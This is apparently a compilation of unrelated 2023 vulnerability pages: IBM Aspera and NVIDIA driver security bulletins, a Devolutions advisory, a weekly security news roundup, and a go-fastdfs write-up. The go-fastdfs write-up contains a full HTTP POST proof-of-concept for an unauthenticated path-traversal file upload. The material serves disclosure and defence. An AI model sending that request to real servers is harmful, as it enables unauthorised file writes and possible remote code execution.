IBM Aspera Cargo 4.2.5 and IBM Aspera Connect 4.2.5 are vulnerable to a buffer overflow, caused by improper bounds checking. An attacker could overflow a buffer and execute arbitrary code on the system. IBM X-Force ID: 248616.

  

**Summary**

This Security Bulletin addresses security vulnerabilities that have been remediated in IBM Aspera Cargo 4.2.5 and IBM Aspera Connect 4.2.5.

**Vulnerability Details**

**CVEID:**   CVE-2023-27286  
**DESCRIPTION:**   IBM Aspera Cargo and IBM Aspera Connect are vulnerable to a buffer overflow, caused by improper bounds checking. An attacker could overflow a buffer and execute arbitrary code on the system.  
CVSS Base score: 8.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/248627 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-27284  
**DESCRIPTION:**   IBM Aspera Cargo and IBM Aspera Connect are vulnerable to a buffer overflow, caused by improper bounds checking. An attacker could overflow a buffer and execute arbitrary code on the system.  
CVSS Base score: 8.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/248616 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Aspera Cargo

v4.2.4 and prior versions

IBM Aspera Connect

v4.2.4 and prior versions

**Remediation/Fixes**

It is recommended to apply the fix **as soon as possible**, see link below.

**Product(s)**

**Fixing VRM**

**Platform(s)**

**Link to Fix**

IBM Aspera Cargo

4.2.5

Windows

click here

IBM Aspera Cargo

4.2.5

Linux

click here

IBM Aspera Cargo

4.2.5

Mac OS

click here

IBM Aspera Connect

4.2.5

Windows

click here

IBM Aspera Connect

4.2.5

Linux

click here

IBM Aspera Connect

4.2.5

Mac OS

click here

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

27 Mar 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSXMXJ","label":"IBM Aspera Faspex On Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"5.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSXNJ7","label":"IBM Aspera Shares On Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.10","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSXMX3","label":"IBM Aspera Connect"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF017","label":"Mac OS"}\],"Version":"4.2.5","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSH2ME","label":"IBM Aspera Cargo"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF017","label":"Mac OS"}\],"Version":"4.2.5","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSGSS4","label":"IBM Aspera Shares"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.10","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS5W4X","label":"IBM Aspera On Cloud"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS8NDZ","label":"IBM Aspera"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSHI916","label":"IBM Aspera Enterprise On Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSQ65JJ","label":"IBM Aspera Enterprise"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSRFYR","label":"IBM Aspera on Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSGPEF","label":"IBM Aspera Faspex"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"5.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-27286: Security Bulletin: IBM Aspera Cargo 4.2.5 and IBM Aspera Connect 4.2.5 have addressed multiple buffer overflow vulnerabilities (CVE-2023-27286, CVE-2023-27284)

Information disclosure in the user creation feature of a MSSQL data source in Devolutions Remote Desktop Manager 2023.1.9 and below on Windows allows an attacker with access to the user interface to obtain sensitive information via the error message dialog that displays the password in clear text.

Security & Compliance Reporting a Security Issue Advisories

**Affected Products**

Remote Desktop Manager 2023.1.9 and below

**Change Log**

Initial publication - 2023-03-22

**Product**

Remote Desktop Manager

**Summary**

Remote Desktop Manager MSSQL data source is affected by a vulnerability.

**Password disclosure in the error dialog of the user creation feature of MSSQL.**

**Description**

Information disclosure in the user creation feature of a MSSQL data source in Devolutions Remote Desktop Manager 2023.1.9 and below on Windows allows an attacker with access to the user interface to obtain sensitive information via the error message dialog that displays the password in clear text.

**Remediation and Workarounds**

Upgrade to Remote Desktop Manager 2023.1.10 and higher.

**Severity**

Low - CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

**Affected Products**

Remote Desktop Manager 2023.1.9 and below.

CVE-2023-1574: DEVO-2023-0006

A vulnerability, which was classified as critical, has been found in sjqzhang go-fastdfs up to 1.4.3. Affected by this issue is the function upload of the file /group1/uploa of the component File Upload Handler. The manipulation leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224768.

go-fastdfs Arbitrary file upload vulnerability

go-fastdfs is a distributed file system based on the http protocol. It is based on the design concept of avenues to simplicity. All simple designs make its operation and maintenance and expansion easier. It has high performance, high reliability, no center, Maintenance-free and other advantages. There is an arbitrary file upload vulnerability in go-fastdfs version 1.4.3 and before. Unauthenticated attackers can directly upload arbitrary files to the system to achieve the purpose of remotely executing commands.

https://github.com/sjqzhang/go-fastdfs/

version go-fastdfs <= v1.4.3

 POST /group1/upload HTTP/1.1
 Host: ip:8080
 Content-Length: 951
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryigj9M9EJykZc9u53
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9
 Connection: close
 
 ------WebKitFormBoundaryigj9M9EJykZc9u53
 Content-Disposition: form-data; name="file"; filename="test"
 Content-Type: application/octet-stream
 
 success
 ------WebKitFormBoundaryigj9M9EJykZc9u53
 Content-Disposition: form-data; name="scene"
 
 default
 ------WebKitFormBoundaryigj9M9EJykZc9u53
 Content-Disposition: form-data; name="filename"
 
 test
 ------WebKitFormBoundaryigj9M9EJykZc9u53
 Content-Disposition: form-data; name="output"
 
 json2
 ------WebKitFormBoundaryigj9M9EJykZc9u53
 Content-Disposition: form-data; name="path"
 
 ../../../../../tmp
 ------WebKitFormBoundaryigj9M9EJykZc9u53
 Content-Disposition: form-data; name="code"
 
 
 ------WebKitFormBoundaryigj9M9EJykZc9u53
 Content-Disposition: form-data; name="auth_token"
 
 
 ------WebKitFormBoundaryigj9M9EJykZc9u53
 Content-Disposition: form-data; name="submit"
 
 upload
 ------WebKitFormBoundaryigj9M9EJykZc9u53--
 
 

Vulnerability analysis：

This place does not filter the path, resulting in path traversal

CVE-2023-1800: ForCVE/2023-0x05.md at main · yangyanglo/ForCVE

Plus: A major new supply chain attack, Biden’s spyware executive order, and a hacking campaign against Exxon’s critics.

Did you hear that Donald Trump got indicted this week? Of course you did. Ridiculous question. The first-ever indictment of a former US president had been looming for weeks. And now that it's happened, the move by a Manhattan grand jury is deepening fissures in America's already-fraught political divide. But while Trump headlines flood your feeds, there were plenty of other big stories this week, none of which have anything to do with any of _that_. 

In Germany, police are cracking down on people who post adult content to websites and platforms that lack age-verification checks, like Twitter. This has resulted in fines and threats of jail time, while some performers are deleting their accounts—or fleeing the country. This is just one of the impacts of a wave of age-verification laws sweeping the global internet.

Meanwhile, in darker corners of the internet, North Korea–backed hackers are using a rare technique to launder their stolen cryptocurrencies: paying to mine clean crypto with loot taken from their victims. The tactic is meant to throw blockchain detectives off the trail of swiped funds. Speaking of ill-gotten gains, Costa Rica is still reeling from a series of ransomware attacks last spring that left swaths of the country's infrastructure devastated. As a result, the US government is sending $25 million in aid to help it recover. 

Most victims of cyberattacks don't get help from the US government, however. Fortunately for them, this week Microsoft announced its new system, Security Copilot, which integrates OpenAI's ChatGPT and home-grown artificial intelligence to help incident responders managed breaches. Of course, the best way to protect yourself from getting hacked is to make sure all your systems are fully patched and up to date.

To top it all off, this week we revealed new documents obtained through a public records request which show that Good Smile, a major toy company that creates figurines for companies like Disney, invested $2.4 million in the toxic imageboard 4chan, helping to keep the company online.

But that's not all. Each week, we dive into the stories we weren't able to report on ourselves. Click on the headlines to read the full stories. And stay safe out there.

The Russian government and military remain the most aggressive in the world when it comes to disruptive acts of cyber-sabotage against civilian infrastructure. But documents leaked by a whistleblower inside a Russian intelligence contractor seem to reveal some new and alarming pages of the Kremlin’s hybrid war playbook.

A consortium of investigative journalists at 11 news outlets including Paper Trail Media, _The Guardian_, and _The Washington Post_ obtained a leak of secret documents from a Russian cybersecurity contractor firm called Vulkan, the Russian word for _volcano_. The documents, which were also analyzed by cybersecurity firm Mandiant, reveal that Vulkan sold software tools to Russian intelligence agencies like the KGB-successor FSB and the GRU military intelligence agency, including its notorious cyberattack-focused team known as Sandworm. 

The tools include one piece of software for scanning the internet for security vulnerabilities and another that seemed designed to organize disinformation campaigns and coordinate offensive hacking operations. Perhaps most disturbing of all was a proposal for a third tool that appeared to be designed to allow hackers to train in simulated networks of infrastructure systems like railways and pipelines, with specific references to methods to sabotage those systems with catastrophic effects. But it’s not clear whether that last tool was ever built, and if so, whether it was used primarily for offensive hacking or “red team” defensive training, or whether it led to the development of any actual hacking capabilities targeting critical infrastructure.

Security experts say North Korea–linked hackers have successfully carried out a supply chain attack through compromised versions of 3CX, a video and voice communications platform used by high-profile companies including American Express and Mercedes-Benz. 3CX says it has more than 600,000 customers. The hackers were able to install malware within the Mac and Windows versions of 3CX, which were signed with the company's keys, thus allowing the Trojanized apps to go undetected. The attack is being compared to Russian hackers' SolarWinds supply chain attack, which wrought havoc around the world for months. 

As hacker-for-hire firms' tools proliferate to governments around the world, the Biden administration has made clear: The US will not be one of that industry's customers. A new executive order bans US agencies from buying access to that commercial spyware, a key step in a growing effort to curb companies like NSO Group, Cytrox, and Candiru, which have enabled surveillance and human rights abuses from Spain to Mexico to Saudi Arabia. US agencies haven't been confirmed to be past customers of any of those companies, though the FBI did at one point test NSO's Phantom spyware before ultimately walking away from a deal with the company. But the order nonetheless sets a precedent for governments worldwide, assuring that US taxpayer funds won't flow to a dangerous industry whose tools have offered intrusive hacking techniques to repressive regimes targeting activists, journalists, and human rights defenders.

While we're on the subject of dangerous hacker-for-hire firms targeting vulnerable activists: The _Wall Street Journal_ reported this week that Indian hacker-for-hire firm BellTroX targeted climate change activists campaigning against Exxon, including Greenpeace, Public Citizen, 350.org, and the Rockefeller Family Fund. The firm was hired by Israeli private detective Aviram Azari, who has since pleaded guilty to hacking conspiracy charges. Exactly who hired Azari remains unclear, and Exxon denies having any connection to Azari or the hacking campaign. The hackers successfully accessed email accounts for Greenpeace, Public Citizen, and 350.org, but it's not yet clear whether they successfully penetrated the Rockefeller Family Fund, an organization created by Rockefeller heirs that has worked to combat the oil industry's efforts to lobby against climate change solutions.

‘Vulkan’ Leak Offers a Peek at Russia’s Cyberwar Playbook

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where improper restriction of operations within the bounds of a memory buffer can lead to denial of service, information disclosure, and data tampering.

**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**NVIDIA GPU Display Driver**

CVE ID

Description

Base Score

CWE and Vector

CVE-2023-0189

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, which may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

8.8

CWE: 822  
AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE‑2023‑0184

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, which may lead to denial of service, escalation of privileges, information disclosure, and data tampering.

8.8

CWE: 822  
AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE-2023-0182

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer, where an out-of-bounds write can lead to denial of service, information disclosure, and data tampering.

7.8

CWE-787  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2023-0181

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in a kernel mode layer handler, where memory permissions are not correctly checked, which may lead to denial of service and data tampering.

7.1

CWE: 280  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE-2023-0191

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds access may lead to denial of service or data tampering.

7.1

CWE: 119  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE-2023-0183

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an out-of-bounds write can lead to denial of service and data tampering.

7.1

CWE-787  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE-2023-0180

NVIDIA GPU Display Driver for Linux contains a vulnerability in a kernel mode layer handler, which may lead to denial of service or information disclosure.

7.1

CWE: 125  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

CVE-2023-0185

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where sign conversion issues may lead to denial of service or information disclosure.

6.7

CWE: 196  
AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:H

CVE-2023-0198

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where improper restriction of operations within the bounds of a memory buffer can lead to denial of service, information disclosure, and data tampering.

6.6

CWE: 119  
AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

CVE-2023-0187

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds read can lead to denial of service.

6.1

CWE: 125  
AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H

CVE-2023-0199

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds write can lead to denial of service and data tampering.

6.1

CWE: 787  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

CVE-2023-0186

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer, where an out-of-bounds write can lead to denial of service and data tampering.

6.1

CWE-787  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

CVE-2023-0190

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where a NULL pointer dereference may lead to denial of service.

5.5

CWE: 476  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2023-0188

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an unprivileged user can cause an out-of-bounds read, which may lead to denial of service.

5.5

CWE: 119  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2023-0192

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer handler, where improper privilege management can lead to escalation of privileges and information disclosure.

4.7

CWE-269  
AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:L

CVE-2023-0194

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer driver, where an invalid display configuration may lead to denial of service.

2.0

CWE: 1284  
AV:P/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2023-0195

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer driver, where an invalid display configuration may lead to information disclosure.

2.0

CWE: 1284  
AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

**NVIDIA vGPU Software**

CVE ID

Description

Base Score

CWE and Vector

CVE‑2023‑0197

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where a malicious user in a guest VM can cause a NULL-pointer dereference, which may lead to denial of service.

5.5

CWE: 476  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk to your specific configuration.

**Security Updates for NVIDIA GPU Display Driver****CVE IDs Addressed in Each Windows Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

Windows Driver Branch

CVE IDs Addressed

R530, R525

CVE-2023-0184, CVE-2023-0182, CVE-2023-0191, CVE-2023-0181, CVE-2023-0199, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0192, CVE-2023-0194, CVE-2023-0195

R515

CVE-2023-0184, CVE-2023-0182, CVE-2023-0191, CVE-2023-0181, CVE-2023-0199, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R470

CVE-2023-0184, CVE-2023-0191, CVE-2023-0181, CVE-2023-0199, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R450

CVE-2023-0184, CVE-2023-0191, CVE-2023-0199, CVE-2023-0186, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

**Security Updates for NVIDIA GPU Windows Display Driver**

The following table lists the NVIDIA software products affected, Windows driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

Software Product

Operating System

Driver Branch

Affected Driver Versions

Updated Driver Version

GeForce

Windows

R530

All driver versions prior to 531.41

531.41

Windows 10 and 11

R470

All drivers versions prior to 474.30 for support of GeForce Kepler desktop

474.30

Windows 7 and 8._x_

R470

All driver versions prior to 474.30

474.30

Studio

Windows

R530

All driver versions prior to 531.41

531.41

R525

All driver versions prior to 528.89

528.89

NVIDIA RTX, Quadro, NVS

  
Windows

R530

All driver versions prior to 531.41

531.41

R525

All driver versions prior to 528.89

528.89

R515

All driver versions prior to 518.03

518.03

R470

All driver versions prior to 474.30

474.30

Tesla

Windows

R525

All driver versions prior to 528.89

528.89

R515

All driver versions prior to 518.03

518.03

R470

All driver versions prior to 474.30

474.30

R450

All driver versions prior to 454.14

454.14

**CVE IDs Addressed in Each Linux Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux driver branch.

Linux Driver Branch

CVE IDs Addressed

R530, R525, R515

CVE-2023-0184, CVE-2023-0189, CVE-2023-0180, CVE-2023-0183, CVE-2023-0185, CVE-2023-0187, CVE-2023-0198, CVE-2023-0199, CVE-2023-0188, CVE-2023-0190, CVE-2023-0194, CVE-2023-0195, CVE-2023-0191

R470

CVE-2023-0184, CVE-2023-0189, CVE-2023-0180, CVE-2023-0185, CVE-2023-0187, CVE-2023-0198, CVE-2023-0199, CVE-2023-0188, CVE-2023-0190, CVE-2023-0194, CVE-2023-0195, CVE-2023-0191

R450

CVE-2023-0184, CVE-2023-0189, CVE-2023-0180, CVE-2023-0185, CVE-2023-0198, CVE-2023-0199, CVE-2023-0188, CVE-2023-0190, CVE-2023-0194, CVE-2023-0195, CVE-2023-0191

**Security Updates for NVIDIA GPU Linux Display Driver**

The following table lists the NVIDIA software products affected, Linux driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

Software Product

Operating System

Driver Branch

Affected Driver Versions

Updated Driver Version

GeForce

Linux

R530

All driver versions prior to 530.41.03

530.41.03

R525

All driver versions prior to 525.105.17

525.105.17

R515

All driver versions prior to 515.105.01

515.105.01

R470

All driver versions prior to 470.182.03

470.182.03

NVIDIA RTX, Quadro, NVS

  
Linux

R530

All driver versions prior to 530.41.03

530.41.03

R525

All driver versions prior to 525.105.17

525.105.17

R515

All driver versions prior to 515.105.01

515.105.01

R470

All driver versions prior to 470.182.03

470.182.03

Tesla

Linux

R525

All driver versions prior to 525.105.17

525.105.17

R515

All driver versions prior to 515.105.01

515.105.01

R470

All driver versions prior to 470.182.03

470.182.03

R450

All driver versions prior to 450.236.01

450.236.01

**Notes:**

*   Your computer hardware vendor may provide you with Windows GPU display driver versions including 531.30, 528.59, 518.01, and 474.26, which also contain the security updates.
*   The tables above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release.

**Security Updates for NVIDIA vGPU Software****CVE IDs Addressed in Each Windows vGPU Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

Windows Driver Branch

CVE IDs Addressed

R525

CVE-2023-0182, CVE-2023-0191, CVE-2023-0181, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R470

CVE-2023-0191, CVE-2023-0181, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R450

CVE-2023-0191, CVE-2023-0186, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

**CVE IDs Addressed in Each Linux vGPU Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux vGPU driver branch

Linux Driver Branch

CVE IDs Addressed

R525

CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0183, CVE-2023-0198, CVE-2023-0188

R470

CVE-2023-0181, CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198

R450

CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198

**CVE IDs Addressed in Each vGPU Manager Driver Branch**

The following table lists the CVE IDs addressed by the update in each vGPU Manager driver branch

vGPU Manager Driver Branch

CVE IDs Addressed

R525

CVE-2023-0197, CVE-2023-0191, CVE-2023-0180, CVE-2023-0183, CVE-2023-0198, CVE-2023-0188, CVE-2023-0185, CVE-2023-0181 , CVE-2023-0192

R470

CVE-2023-0181, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198, CVE-2023-0185

R450

CVE-2023-0191, CVE-2023-0180, CVE-2023-0198, CVE-2023-0185

**Affected Products, Affected Versions, and Updated Versions**

The following table lists NVIDIA software products affected, versions affected, and the updated version that includes this security update.

CVE IDs Addressed

Software Product

Operating System

Affected Versions

Updated Version

vGPU Software

Driver

vGPU Software

Driver

CVE‑2023‑0182  
CVE‑2023‑0191  
CVE‑2023‑0181  
CVE‑2023‑0186  
CVE‑2023‑0187  
CVE‑2023‑0188  
CVE‑2023‑0194  
CVE‑2023‑0195

vGPU software (guest driver)

Windows

All versions prior to and including 15.1

528.24

15.2

528.89

All versions prior to and including 13.6

474.14

13.7

474.30

All versions prior to and including 11.11

454.02

11.12

454.14

CVE-2023-0189  
CVE‑2023‑0191  
CVE‑2023‑0180  
CVE‑2023‑0181  
CVE‑2023‑0183  
CVE‑2023‑0198  
CVE‑2023‑0188

vGPU software (guest driver)

Linux

All versions prior to and including 15.1

525.85.05

15.2

525.105.17

All versions prior to and including 13.6

470.161.03

13.7

470.182.03

All versions prior to and including 11.11

450.216.04

11.12

450.236.01

CVE-2023-0197  
CVE‑2023‑0191  
CVE‑2023‑0180  
CVE‑2023‑0181  
CVE‑2023‑0183  
CVE‑2023‑0185  
CVE‑2023‑0198  
CVE‑2023‑0188  
CVE‑2023‑0192

vGPU software (Virtual GPU Manager)

Citrix Hypervisor,  
VMware vSphere, Red Hat Enterprise Linux KVM

All versions prior to and including 15.1

525.85.07

15.2

525.105.14

All versions prior to and including 13.6

470.161.02

13.7

470.182.02

All versions prior to and including 11.11

450.216.04

11.12

450.236.03

**Notes:**

*   The table above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release.

**Security Updates for NVIDIA Cloud Gaming****CVE IDs Addressed in Each Windows Cloud Gaming Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

Windows Driver Branch

CVE IDs Addressed

R525

CVE-2023-0182, CVE-2023-0191, CVE-2023-0181, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R470

CVE-2023-0191, CVE-2023-0181, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R450

CVE-2023-0191, CVE-2023-0186, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

**CVE IDs Addressed in Each Linux Cloud Gaming Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux Cloud Gaming driver branch

Linux Driver Branch

CVE IDs Addressed

R525

CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0183, CVE-2023-0198, CVE-2023-0188, CVE-2023-0181

R470

CVE-2023-0181, CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198

R450

CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198

**CVE IDs Addressed in Each Cloud Gaming Manager Driver Branch**

The following table lists the CVE IDs addressed by the update in each Cloud Gaming Manager driver branch

vGPU Manager Driver Branch

CVE IDs Addressed

R525

CVE-2023-0197, CVE-2023-0191, CVE-2023-0180, CVE-2023-0183, CVE-2023-0198, CVE-2023-0188, CVE-2023-0185, CVE-2023-0181, CVE-2023-0192

R470

CVE-2023-0181, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198, CVE-2023-0185

R450

CVE-2023-0191, CVE-2023-0180, CVE-2023-0198, CVE-2023-0185

The following table lists the NVIDIA software products affected, versions affected, and the updated version that includes this security update.

CVE IDs Addressed

Software Product

Operating System

Affected Versions

Updated Version

Cloud Gaming Software

Driver

Cloud Gaming Software

Driver

CVE‑2023‑0182  
CVE‑2023‑0191  
CVE‑2023‑0181  
CVE‑2023‑0186  
CVE‑2023‑0187  
CVE‑2023‑0188  
CVE‑2023‑0194  
CVE‑2023‑0195

NVIDIA Cloud Gaming (guest driver)

Windows

All versions prior to and including February 2023 release

All versions prior to 528.49

March 2023 release

531.41

CVE‑2023‑0189  
CVE‑2023‑0191  
CVE‑2023‑0180  
CVE‑2023‑0181  
CVE‑2023‑0183  
CVE‑2023‑0198  
CVE‑2023‑0188

NVIDIA Cloud Gaming (guest driver)

Linux

All versions prior to and including February 2023 release

All versions prior to 525.89.02

March 2023 release

530.41.03

CVE‑2023‑0197  
CVE‑2023‑0191  
CVE‑2023‑0180  
CVE‑2023‑0181  
CVE‑2023‑0183  
CVE‑2023‑0185  
CVE‑2023‑0198  
CVE‑2023‑0188  
CVE‑2023‑0192

NVIDIA Cloud Gaming (Virtual GPU Manager)

Red Hat Enterprise Linux KVM

All versions prior to and including February 2023 release

All versions prior to 525.89.02

March 2023 release

530.41.03

**Acknowledgements**

NVIDIA thanks the following people for reporting the issues to us:

